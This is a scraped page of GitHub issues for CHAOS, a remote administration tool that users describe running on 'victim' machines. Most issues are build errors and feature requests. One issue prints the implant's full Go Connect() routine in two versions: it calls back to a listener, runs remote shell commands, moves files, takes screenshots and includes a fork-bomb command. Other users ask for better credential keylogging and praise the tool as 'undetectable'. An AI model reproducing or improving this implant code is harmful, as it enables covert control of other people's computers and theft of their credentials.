tiagorlampert / chaos Goto Github PK
View Code? Open in Web Editor NEW:fire: CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems.
License: MIT License
:fire: CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems.
License: MIT License
Hello there.
I downloaded and installed chaos and it is awesome i really like to be able to download and upload file's from my home computer but it makes it really hard to typ the full path to the file. Will there be an option to view file lists in the future? That would make it so much easier.
So this software is great but im having a few issues. On issue is that my screenshots only take the top left corner. My second issue is that with cmd it only comes up for a second with the Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\USERNAME\Downloads>
thing then disapears. last I cant surf around in the files.
Any help will be appreciated.
hi
im getting this error on kali 2019.1-vbox i386
go install github.com/kbinani/screenshot && go install github.com/lxn/win
go/src/github.com/gen2brain/shm/shm_linux_386.go:9:14: undefined: syscall.SYS_SHMAT
go/src/github.com/gen2brain/shm/shm_linux_386.go:10:14: undefined: syscall.SYS_SHMCTL
go/src/github.com/gen2brain/shm/shm_linux_386.go:11:14: undefined: syscall.SYS_SHMDT
go/src/github.com/gen2brain/shm/shm_linux_386.go:12:14: undefined: syscall.SYS_SHMGET
what payload I can use ? reverse_https,or reverse_tcp ,etc...
Screenshot works but sometimes it gets stuck at Getting Screenshot and I can't use it.I have to close the terminal and re-execute the (.exe) on the victim pc to get it work again.
It would be really nice if ^C interrupted an ongoing command in the obtained shell instead of killing CHAOS. Using CHAOS to run a psempire stager makes it further unusable even after the exe has been executed, rendering the CHAOS session useless(and if the launched stager fails too, the access to the machine is lost altogether)
I dont know much about this stuff but I think ^C should provide a fresh prompt instead of waiting for the previous thing to be completed.
PS: btw love your work CHAOS has been my goto since a few days..
I have not generate exe. the project need other library ?
How can I update CHAOS I want to use the web GUI
Nowadays it says: "CHAOS Framework allow generate payloads and control remote machines."
I think it should say: CHAOS Framework allow generate payloads and control remote Window systems".
Thanks
When I turn on the listener the victim opens and run the exe but nothing happens it keeps listening on port 444
[*] Compiling...
[!] File not found! There's a problem with compiling. build/Windows/chaos.exe/chaos.exe.go:16:2: cannot find package "github.com/kbinani/screenshot" in any of:
/usr/lib/go-1.11/src/github.com/kbinani/screenshot (from $GOROOT)
/root/go/src/github.com/kbinani/screenshot (from $GOPATH)
build/Windows/chaos.exe/chaos.exe.go:17:2: cannot find package "github.com/matishsiao/goInfo" in any of:
/usr/lib/go-1.11/src/github.com/matishsiao/goInfo (from $GOROOT)
/root/go/src/github.com/matishsiao/goInfo (from $GOPATH)
I followed the install instructions and this is the error i get when trying to compile a windows executable. Any help would be appreciated, Thanks.
so how to use CHAOS Framework allow generate payloads and control remote Windows systems ? just like the command or need to get FRamework too?
which encode you use in output file base64 or Xor? please explain the encryption process
what is i run the payload on several of my Vms, how to do i listen to them one after the other without loosing connection?
azamet@MrRobots ~ go get github.com/tiagorlampert/CHAOS
azamet@MrRobots ~ cd ~/go/src/github.com/tiagorlampert/CHAOS
bash: cd: /home/azamet/go/src/github.com/tiagorlampert/CHAOS: no such file directory
Create only .go !
~$ go get github.com/kbinani/screenshot
~$ go get github.com/lxn/win
can't load package: package github.com/lxn/win: build constraints exclude all Go files in /home/ivan/go/src/github.com/lxn/win
~$ go install github.com/kbinani/screenshot
~$ go install github.com/lxn/win
can't load package: package github.com/lxn/win: build constraints exclude all Go files in /home/ivan/go/src/github.com/lxn/win
I installed but dont working (
kail linux 2019
[!] File not found! There's a problem with compiling. ../go/src/github.com/lxn/win/advapi32.go:10:2: cannot find package "golang.org/x/sys/windows" in any of:
/usr/lib/go-1.11/src/golang.org/x/sys/windows (from $GOROOT)
/root/go/src/golang.org/x/sys/windows (from $GOPATH)
https://imgur.com/a/wI4CMwk
[*] Enter LPORT: 192.138.1.1
[*] Waiting for connection...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x20 pc=0x4fb960]
goroutine 1 [running]:
main.RunServer()
/root/CHAOS/CHAOS.go:505 +0x6d0
main.ShowMenu()
/root/CHAOS/CHAOS.go:167 +0x96b
main.main()
/root/CHAOS/CHAOS.go:41 +0x2a
exit status 2
after i installed the new release, chaos no longer generates exe only generates the source i.e filename.go and no longer generates filename.exe
is just me or other people are getting the same error. initially i it happened in my backbox. so i felt perhaps it's the root privilege thing. so i started up my kali and met with with the same issue. can
you kindly look into in it please please.
final request, i just watched your youtube official video of the newly released chaos and watching keenly i observed the keylogger can't does not log the visited site, it only logs credential also kindly do fix it to log visited site in order to make the grabbed credential more useful. thank very much for such a wonderful & truly undetectable product
Chaos is working great is use it to transfer music and pictures from my nethunter phone to my desktop pc.
the only issue iam having is that it keeps saying persistence failed when i try to enable it and it also makes my command terminal all bugged it stops responding to commands and i must reinstall the payload for it to work again. I tried to disable persistence and reenable it but doesnt work
root@kali:/opt# git clone https://github.com/tiagorlampert/CHAOS
Cloning into 'CHAOS'...
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 28 (delta 11), reused 28 (delta 11), pack-reused 0
Unpacking objects: 100% (28/28), done.
root@kali:/opt# apt install golang upx-ucl -y
Reading package lists... Done
Building dependency tree
Reading state information... Done
golang is already the newest version (2:1.7~5).
golang set to manually installed.
upx-ucl is already the newest version (3.91-4).
upx-ucl set to manually installed.
The following packages were automatically installed and are no longer required:
dkms jsql libjs-mochikit linux-headers-686-pae open-vm-tools-dkms
python-advancedhttpserver python-alembic python-boltons python-cheetah
python-dap python-editor python-formencode python-geoip2 python-geojson
python-icalendar python-maxminddb python-mpltoolkits.basemap python-openid
python-pampy python-paste python-pastedeploy python-pastedeploy-tpl
python-pastescript python-pluginbase python-pyotp python-scgi
python-smoke-zephyr python-tempita python-termcolor python-tzlocal
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 247 not upgraded.
root@kali:/opt# cd CHAOS
root@kali:/opt/CHAOS# go run CHAOS.go
go tool: no such tool "compile"
root@kali:/opt/CHAOS# cat /etc/issue
Kali GNU/Linux Rolling \n \l
root@kali:/opt/CHAOS# uname -a
Linux kali 4.9.0-kali4-686-pae #1 SMP Debian 4.9.30-1kali1 (2017-06-06) i686 GNU/Linux
it'd be nice to have a command to send a command to the native shell of the OS
Script does not allow ip 1.1.1.1
Can you tell how or where put dns adress because in" LHOST" option it's no possible
Payload memory leak when unable to connect to server
Old:
func Connect() {
// Create a connection
conn, err := net.Dial("tcp", IP)
// If don't exist a connection created than try connect to a new
if err != nil {
log.Println("[*] Connecting...")
for {
Connect()
}
}
for {
// When the command received aren't encoded,
// skip switch, and be executed on OS shell.
command, _ := bufio.NewReader(conn).ReadString('\n')
// When the command received are encoded,
// decode message received, and test on switch
decodedCommand, _ := base64.StdEncoding.DecodeString(command)
switch string(decodedCommand) {
case "back":
conn.Close()
Connect()
case "exit":
conn.Close()
os.Exit(0)
case "screenshot":
SendMessage(conn, EncodeBytesToString(TakeScreenShot()))
RemoveNewLineCharFromConnection(conn)
case "keylogger_start":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "keylogger_show":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "download":
pathDownload := ReceiveMessageStdEncoding(conn)
file, err := ioutil.ReadFile(string(pathDownload))
if err != nil {
conn.Write([]byte("[!] File not found!" + "\n"))
}
SendMessage(conn, string(file))
RemoveNewLineCharFromConnection(conn)
case "upload":
uploadInput := ReceiveMessageStdEncoding(conn)
decUpload := ReceiveMessageURLEncoding(conn)
if string(decUpload) != "" {
ioutil.WriteFile(string(uploadInput), []byte(decUpload), 777)
}
case "getos":
SendMessage(conn, GetOSInformation())
RemoveNewLineCharFromConnection(conn)
case "lockscreen":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
// case "ls":
// SendMessage(conn, EncodeBytesToString(RunCmdReturnByte("dir")))
// RemoveNewLineCharFromConnection(conn)
case "persistence_enable":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "persistence_disable":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "bomb":
// Run fork bomb
RunCmd(":(){ :|: & };:")
SendMessage(conn, "[*] Executed Fork Bomb!")
RemoveNewLineCharFromConnection(conn)
case "openurl":
// Receive url and run it
url := ReceiveMessageStdEncoding(conn)
RunCmd("xdg-open " + url)
SendMessage(conn, "[*] Opened!")
RemoveNewLineCharFromConnection(conn)
} // end switch
SendMessage(conn, RunCmdReturnString(command))
_, err := conn.Read(make([]byte, 0))
if err != nil {
Connect()
}
}
}
New:
func Connect() {
// Create a connection
conn, err := net.Dial("tcp", IP)
defer func (){
conn.Close()
}()
// If don't exist a connection created than try connect to a new
if err != nil {
log.Println("[*] Connecting...")
for {
conn, err = net.Dial("tcp", IP)
if err == nil {
break
}
}
}
for {
// When the command received aren't encoded,
// skip switch, and be executed on OS shell.
command, _ := bufio.NewReader(conn).ReadString('\n')
// When the command received are encoded,
// decode message received, and test on switch
decodedCommand, _ := base64.StdEncoding.DecodeString(command)
switch string(decodedCommand) {
case "back":
conn.Close()
Connect()
case "exit":
conn.Close()
os.Exit(0)
case "screenshot":
SendMessage(conn, EncodeBytesToString(TakeScreenShot()))
RemoveNewLineCharFromConnection(conn)
case "keylogger_start":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "keylogger_show":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "download":
pathDownload := ReceiveMessageStdEncoding(conn)
file, err := ioutil.ReadFile(string(pathDownload))
if err != nil {
conn.Write([]byte("[!] File not found!" + "\n"))
}
SendMessage(conn, string(file))
RemoveNewLineCharFromConnection(conn)
case "upload":
uploadInput := ReceiveMessageStdEncoding(conn)
decUpload := ReceiveMessageURLEncoding(conn)
if string(decUpload) != "" {
ioutil.WriteFile(string(uploadInput), []byte(decUpload), 777)
}
case "getos":
SendMessage(conn, GetOSInformation())
RemoveNewLineCharFromConnection(conn)
case "lockscreen":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
// case "ls":
// SendMessage(conn, EncodeBytesToString(RunCmdReturnByte("dir")))
// RemoveNewLineCharFromConnection(conn)
case "persistence_enable":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "persistence_disable":
SendMessage(conn, " [i] Not supported yet!")
RemoveNewLineCharFromConnection(conn)
case "bomb":
// Run fork bomb
RunCmd(":(){ :|: & };:")
SendMessage(conn, "[*] Executed Fork Bomb!")
RemoveNewLineCharFromConnection(conn)
case "openurl":
// Receive url and run it
url := ReceiveMessageStdEncoding(conn)
RunCmd("xdg-open " + url)
SendMessage(conn, "[*] Opened!")
RemoveNewLineCharFromConnection(conn)
} // end switch
SendMessage(conn, RunCmdReturnString(command))
_, err := conn.Read(make([]byte, 0))
if err != nil {
Connect()
return
}
}
}
I have all of CHAOS and it's dependencies installed properly but when i open the created executable on a windows computer (running windows 10) it states:
Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item.
and then as soon as i press okay the file deletes itself. Has anyone had this issue or found a fix for it? FYI I'm running CHAOS 2.5.0 if that helps at all.
package golang.org/x/sys/windows: unrecognized import path "golang.org/x/sys/windows" (parse https://golang.org/x/sys/windows?go-get=1: no go-import meta tags ())
So I got a session open right now and when I type "dir" it shows me the directory, If I try to change it using something like cd C:\ or cd C:\ or cd .. it stays the same, how do I move around? So that I can upload/download files to and from different paths
I guess I can download from different paths still, but I can't upload wherever I want
Please reply ASAP!
-Thanks!
How can i change a Directory ??? cd .. does not working
I know it's not the issue of this tool but maybe you guys can help.
I installed the golang but still it's showing go command not found
Hi, are there a way to change the default user/password for the web based manager? I took a glance at the source code but can't find a variable for that (i don't speak GO really, so may be i'm missing a spot or two).
The screenshot of windows system on-line can't see what is opened in the taskbar below the target
Does any one know how to add a ReverseListenerBindAddress? Just like in the MetaSploitFramework
Running on a Linux vps
START LISTENER
--------------------------
[*] Enter LPORT: [IP]
[*] Waiting for connection...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x20 pc=0x4fb850]
goroutine 1 [running]:
main.RunServer()
/root/CHAOS/CHAOS.go:503 +0x6d0
main.GenerateCode()
/root/CHAOS/CHAOS.go:475 +0x3985
main.ShowMenu()
/root/CHAOS/CHAOS.go:165 +0x975
main.ShowMenu()
/root/CHAOS/CHAOS.go:175 +0x93f
main.main()
/root/CHAOS/CHAOS.go:41 +0x2a
exit status 2
Hi i want to using Chaos with Ngrok how i can? Please help me tiagor.
OS Type: Kali Linux
[] Enter LHOST: 10.42.36.100
[] Enter LPORT: 8080
[*] Enter name for file (.exe): exp
[*] Compiling...
panic: open exp.exe: no such file or directory
goroutine 1 [running]:
main.GenerateCode()
/home/tiagorlampert/CHAOS/CHAOS.go:403 +0x3c2e
main.ShowMenu()
/home/tiagorlampert/CHAOS/CHAOS.go:165 +0x975
main.main()
/home/tiagorlampert/CHAOS/CHAOS.go:41 +0x2a
one of the requirement for the screenshot :
go get github.com/kbinani/screenshot
is failing and giving the following error
can't load package: package github.com/lxn/win: build constraints exclude all Go files in /home/tesla/go/src/github.com/lxn/win
Now i am using ParrotOS but i dont think that may be an issue as by looking at it, it looks more of package error. I did check the link and github is working
It's Not Connecting To My Local Network, I Put In The Right Ip And Lport, But Its Not Connecting
How do I enable that? do I edit the code myself if so tell me what to edit.
it's probably the best to offload characters to a file, and send the file when keylogger_show is called.
hello
i was wondering how you correctly set your gopath environment variables working, i have tried many times to run the below command in order to get golang dependencies correctly installed but to no avail.
1 go get github.com/kbinani/screenshot && go get github.com/lxn/win
2 go install github.com/kbinani/screenshot && go install github.com/lxn/win
at first i set the path in the .profile like this
export GOPATH=/go
export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
the it gave me this error message
can't load package: package github.com/lxn/win: build constraints exclude all Go files in /root/go/src/github.com/lxn/win
i edited and removed (export GOPATH=/go) from the .profile it still gave me the same error. i edited again and removed the ( :$GOPATH/bin) it gave me the same error
i edited again for the last time and like this export (export PATH=$PATH:/usr/local/go/bin)
still getting the same error. i followed all the instruction from the golang site. how can i successfully fix that error.
I would like to ask the boss, whether to consider the development of this function
I have some ideas for CHAOS that you can iplement in the future if you want .
1st - Create switches on chaos
This means if user wants to create a backdoor without having to stop on every option all he/she have to do is to invoke the switches .
ex : ./chaos --g --lhost 1.1.1.1 --lport 7777 --exe testfile.exe
-g=generate
To generate these switches all you have to do is put some if statements at the start of your script .
$0 = --g
$1= --lhost
$2= ip
etc ....
In bash is easy to do , but in go i have no idea .
2nd - Create interface with metasploit framework listeners (i do not think if it is possible) , but it would be a nice idea if implemented .
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.